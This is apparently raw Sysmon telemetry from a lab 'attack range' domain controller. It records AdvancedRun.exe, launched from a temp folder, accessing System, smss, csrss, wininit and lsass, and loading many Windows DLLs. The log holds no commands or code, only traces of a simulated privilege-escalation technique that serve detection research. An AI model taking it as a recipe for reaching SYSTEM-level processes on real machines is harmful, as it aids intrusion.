10341000x80000000000000004075270Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.055{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075269Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.055{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075268Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.055{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075267Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.054{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075266Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.047{834264DD-DAE4-61EA-0C00-000000002702}6524660C:\Windows\system32\lsass.exe{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004075265Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.036{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075264Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.033{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.032{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075262Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.032{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075261Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.031{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004075260Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.030{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075259Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.029{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.029{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075257Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.029{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.028{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.028{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.027{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.027{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075252Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.026{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.026{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004075250Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.026{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075249Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.026{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075248Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.026{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075246Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075244Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft 
CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075243Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004075240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.024{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075239Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.023{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075238Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.022{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075237Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.022{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075236Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.021{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075235Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.020{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075234Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.020{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
